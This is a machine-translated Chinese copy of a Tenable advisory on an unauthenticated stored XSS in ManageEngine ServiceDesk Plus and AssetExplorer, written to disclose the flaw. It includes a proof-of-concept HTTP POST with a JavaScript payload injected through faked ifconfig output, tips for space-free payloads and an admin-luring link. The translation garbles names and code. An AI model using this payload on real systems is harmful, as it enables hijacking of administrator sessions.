脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

ManageEngine ServiceDesk +存储XSS和AssetExplorer——未经身份验证的

媒介

剧情简介

注意:对ManageEngine服务台+进行了研究。ManageEngine列表AssetExplorer作为影响发行说明。

存储跨站点脚本漏洞存在于资产的XML处理逻辑的发现。通过发送的HTTP POST请求/ discoveryServlet / WsDiscoveryServlet,远程,未经身份验证的攻击者可以创建一个包含恶意JavaScript资产。当该资产管理员视图时,JavaScript将执行。这个可以被利用来执行身份验证应用程序行为代表管理员用户。

起草文章/ discoveryServlet WsDiscoveryServlet使XML文件中创建“C: \ Program Files \ ManageEngine \ ServiceDesk \ scannedxmls”目录。在一两分钟,然后解析XML文件,数据是用来创建一个资产。在类unix主机的情况下提供的输出“/ sbin / ifconfig”命令,资产提取的IP地址的输出。

当新的资产/ ViewCIDetails观看。做,IP地址的值是不安全的用于创建一个JavaScript代码块。具体来说,clickToExpandIP()函数构造使用这个值。这允许攻击者注入任意JavaScript。

概念验证

以下HTTP POST请求包含一个XML文档:

POST / discoveryServlet / WsDiscoveryServlet吗?computerName = tenable12345 HTTP / 1.1主持人:172.26.31.177:8080 user - agent: Mozilla / 5.0 (Windows NT 10.0;Win64;x64) AppleWebKit / 537.36 (KHTML,像壁虎)Chrome / 87.0.4280.88 Safari 537.36接受:* / *推荐人:http://172.26.31.177:8080接受编码:gzip、缩小接收语言:en - us, en; q = 0.9连接:紧密- type: application / xml内容长度:2040 < ?xml version = " 1.0 " encoding = " utf - 8 " ? > < DocRoot > < ComputerName > <命令>主机名< /命令> <输出> < ![CDATA[]] > < /输出> < / ComputerName > < OS_Category > <命令> uname - s命令< / > <输出> < ![CDATA[达尔文]]> < /输出> < / OS_Category > < Hardware_Info > < OS_Category > <命令> sw_vers < /命令> <输出> < ![CDATA [ProductName: macOS ProductVersion: 11.1 BuildVersion: 20 c69]] > < /输出> < / OS_Category > < Computer_Information > <命令>主机名- s命令< / > <输出> < ![CDATA [newworkstation3]] > < /输出> < / Computer_Information > < CPU_Information > <命令> system_profiler SPHardwareDataType < /命令> <输出> < ![CDATA[硬件:硬件概述:模型名称:MacBook Pro模式标识符:MacBookPro14, 3处理器名称:四核Intel Core i7处理器速度:2.9 GHz处理器数量:1核心总数:4 L2高速缓存(每核心):256 KB L3缓存:8 MB超线程技术:启用内存:16 GB的系统固件版本:429.60.3.0.0 SMC版本(系统):2.45 f4序列号(系统):A03XJ3PMHTK9]] > < /输出> < / CPU_Information > < NIC_Info > <命令> / sbin / ifconfig命令< / > <输出> < ![CDATA [en0:旗帜= 8863 <,广播,聪明,跑步,单纯形,多播> mtu 1500选项= 400 < CHANNEL_IO >乙醚8 c: 85:90: d4: a6: e9 inet6 fe80:: 103: 588: 7772: e9db % en0 prefixlen 64担保scopeid 0 x5 inet);}{警报(xss); / /子网掩码0 xffffff00广播192.168.0.255 nd6选项= 201 < PERFORMNUD,爸爸>媒体:自动选择状态:积极]]> < /输出> < / NIC_Info > < PhysicaldrivesInfo > <命令> / usr / sbin / system_profiler SPParallelATADataType < /命令> <输出> < ![CDATA[]] > < /输出> < / PhysicaldrivesInfo > < HarddrivesInfo > <命令> / usr / sbin / system_profiler SPSerialATADataType < /命令> <输出> < ![CDATA[]] > < /输出> < / HarddrivesInfo > < / Hardware_Info > < Software_Info > < Installed_Softwares > <命令> system_profiler SPApplicationsDataType < /命令> <输出> < ![CDATA[]] > < /输出> < / Installed_Softwares > < / Software_Info > < / DocRoot >

具体注意/sbin/ifconfig命令的输出。脆弱的线始于“inet”之后,预计一个IPv4地址。

然而,这里一个恶意的价值已经包括在子网掩码:

inet);}{警报(xss); / /子网掩码……

如前所述,这将被纳入JavaScript函数。在这种情况下,函数将被构造成这样:

函数clickToExpandIP () {jQuery (# ips)。文本(“(”);}{警报(xss); / /]);}

在这种情况下,一旦资产看待,会弹出一个警告包含文本,“xss”。

请注意,这是一个简单的概念;然而,更复杂的JavaScript代码可以实现。

最后一点,是IP地址提取完全基于一个假设,即空间会发生后其价值。没有确认的地址。可以构造复杂的JavaScript载荷,没有空格。例如:

var = new试验();

等价于:

var / * * /测试= new / * * /测试();

此外,触发这个漏洞的可能性会增加如果攻击者发送一个良性的链接到管理员,如/ SearchN.do ? searchText = newworkstation3&subModSelText = &selectName =资产。如果访问,搜索结果将恶意资产列表。

解决方案

升级到ServiceDesk +版本11200和/或AssetExplorer版本6800。

披露时间表

03/17/2021——通过ZoHo站得住脚的bug报告bug赏金门户。90天的日期是2021年6月15日。
03/24/2021——站得住脚的要求更新。
04/07/2021——站得住脚的要求更新。
XSS是修补04/08/2021——站得住脚的通知。今天的意向通知Zoho发布一个顾问。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2021 - 11所示
信贷

克里斯•莱恩

CVSSv3基地/时间的分数
6.1/5.5
CVSSv3向量
CVSS: 3.0 / AV: N /交流:L /公关:N / UI: R / S: C / C: L /我:L /答:N
更多关键字
sd - 93706
aei - 93706
受影响的产品
在11200年之前ManageEngine ServiceDesk +
在6800年之前ManageEngine AssetExplorer
风险因素
媒介

咨询时间

04/08/2021——咨询发表。
06/09/2021——添加额外的引用。

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map